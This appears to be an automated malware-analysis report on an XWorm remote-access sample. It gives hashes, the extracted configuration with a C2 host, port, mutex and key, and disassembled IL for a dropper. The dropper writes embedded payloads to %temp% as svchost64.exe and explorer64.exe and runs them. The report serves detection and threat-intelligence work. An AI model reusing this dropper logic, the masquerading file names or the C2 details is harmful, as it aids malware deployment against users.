Symbol Obfuscation Score

| Hash | Hash Value |
|---|---|
| MD5 | 57f12202d24edea1d98cc4ffcbd6b9c6 |
| Sha1 | 65b2a84fdb30e0a1e94c2b2ae1c75093093c77a0 |
| Sha256 | c7f4e1aba81ad7714da4487dd279cc886b50428116b614c9ebe246d937c478f0 |
| Sha384 | da45f6c6b25a5984dbcef1a2820f10a9ed7a77398d13c827f928080332f946b36d821ff7b82724ca42a7b894e8e73c72 |
| Sha512 | 1ba7f140a070a166e1e3b05df9a26102376ef1f11b94e6fd4004ba4f603a0321603c4070caf6f6293fb6bbff8d7212f60c80501d8828fb13ceee942b6caa609f |
| SSDeep | 98304:nb32noKQfZrHVbfub6nloi8DbTqgIWKm77LrwkEpX:nDpb+6l2DagIeLsl |
| TLSH | 6A36D0017B958D01E16A1B36C2BB4504777BAC425672FF0B79A876AD1D2E3C3AC18F87 |

PeID

| Config. Field | Value |
|---|---|
| Mutex | Rx6I6TBczb3u2uDI |
| Hosts | tcp.cloudpub.ru |
| Port | 54193 |
| KEY | <wallacy2k> |
| USBNM | <Xwormmm> |
| LoggerPath | %Public% |
| family | xworm |

| Name | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: C:\Users\Professor\Desktop\BitJoiner\payload\obj\Debug\payload.pdb |
| Module Name | payload.exe |
| Full Name | payload.exe |
| EntryPoint | System.Void payload.Main::Main() |
| Scope Name | payload.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | payload |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.7.2 |
| Total Strings | 6 |
| Main Method | System.Void payload.Main::Main() |
| Main IL Instruction Count | 189 |
| Main IL | nop <null> ldc.i4.0 <null> stloc.s V_5 nop <null> ldloc.s V_5 brtrue.s IL_000E: ldloc.1 br IL_010C: nop ldloc.1 <null> ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.0 <null> ldloc.0 <null> ldc.i4.0 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::DivideObject(System.Object,System.Object) stloc.s V_4 ldloc.1 <null> ldloc.1 <null> ldc.i4.5 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) ldc.i4 150 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.s 9 box System.Int32 ldloc.s V_4 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::XorObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) stloc.1 <null> ldloc.0 <null> ldc.i4.s 10 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::DivideObject(System.Object,System.Object) ldloc.3 <null> ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.4 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::IntDivideObject(System.Object,System.Object) stloc.2 <null> ldloc.2 <null> ldc.i4.1 <null> box System.Int32 ldloc.0 <null> call System.Object 
Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) ldc.i4.s 15 box System.Int32 ldloc.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::SubtractObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> ldloc.s V_6 ldc.i4.0 <null> box System.Int32 ldloc.1 <null> ldc.i4.1 <null> box System.Int32 ldloca.s V_13 ldloca.s V_6 call System.Boolean Microsoft.VisualBasic.CompilerServices.ObjectFlowControl/ForLoopControl::ForLoopInitObj(System.Object,System.Object,System.Object,System.Object,System.Object&,System.Object&) brfalse.s IL_010C: nop ldloc.2 <null> ldloc.0 <null> ldloc.2 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::ModObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> br.s IL_00F6: ldloc.2 ldloc.2 <null> ldc.i4.5 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> nop <null> br.s IL_00FE: nop nop <null> ldloc.2 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brtrue.s IL_00E5: ldloc.2 nop <null> ldloc.s V_6 ldloc.s V_13 ldloca.s V_6 call System.Boolean Microsoft.VisualBasic.CompilerServices.ObjectFlowControl/ForLoopControl::ForNextCheckObj(System.Object,System.Object,System.Object&) brtrue.s IL_00D5: ldloc.2 nop <null> ldloc.s V_5 brtrue.s IL_0119: nop ldc.i4.1 <null> stloc.s V_5 br IL_0004: nop nop <null> br IL_01BF: ldloc.s V_5 ldstr %temp%\ call System.String System.Environment::ExpandEnvironmentVariables(System.String) stloc.s V_7 nop <null> ldloc.s V_7 ldstr svchost64.exe call System.String 
System.String::Concat(System.String,System.String) stloc.s V_8 ldloc.s V_7 ldstr \explorer64.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_9 ldloc.s V_8 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0159: ldloc.s V_8 ldloc.s V_8 call System.Void System.IO.File::Delete(System.String) nop <null> ldloc.s V_8 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_016F: nop ldloc.s V_8 call System.Byte[] payload.My.Resources.Resources::get__1() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) nop <null> nop <null> ldloc.s V_9 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0181: ldloc.s V_9 ldloc.s V_9 call System.Void System.IO.File::Delete(System.String) nop <null> ldloc.s V_9 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_0197: nop ldloc.s V_9 call System.Byte[] payload.My.Resources.Resources::get__2() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) nop <null> nop <null> ldloc.s V_8 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.s V_9 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_01BA: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_10 nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01BA: nop nop <null> ldc.i4.0 <null> stloc.s V_5 nop <null> ldloc.s V_5 box System.Boolean call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldloc.2 <null> ldc.i4.0 <null> box System.Int32 ldc.i4.0 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::CompareObjectEqual(System.Object,System.Object,System.Boolean) call System.Object 
Microsoft.VisualBasic.CompilerServices.Operators::NotObject(System.Object) call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldloc.0 <null> ldc.i4.s 50 box System.Int32 ldc.i4.0 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Operators::ConditionalCompareObjectEqual(System.Object,System.Object,System.Boolean) box System.Boolean call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldc.i4.1 <null> box System.Boolean br.s IL_020E: nop ldc.i4.0 <null> box System.Boolean nop <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brtrue IL_011F: ldstr "%temp%\\" nop <null> ret <null> |

| Name | Value |
|---|---|
| Mutex | Rx6I6TBczb3u2uDI |
| CnC | tcp.cloudpub.ru |
| Port | 54193 |

| Name | Value | Location |
|---|---|---|
| Mutex | Rx6I6TBczb3u2uDI Malicious | 57f12202d24edea1d98cc4ffcbd6b9c6 > .Net Resources > payload.Resources.resources > _1 > .Net Resources > payload.Resources.resources > _2 |
| CnC | tcp.cloudpub.ru Malicious | 57f12202d24edea1d98cc4ffcbd6b9c6 > .Net Resources > payload.Resources.resources > _1 > .Net Resources > payload.Resources.resources > _2 |
| Port | 54193 Malicious | 57f12202d24edea1d98cc4ffcbd6b9c6 > .Net Resources > payload.Resources.resources > _1 > .Net Resources > payload.Resources.resources > _2 |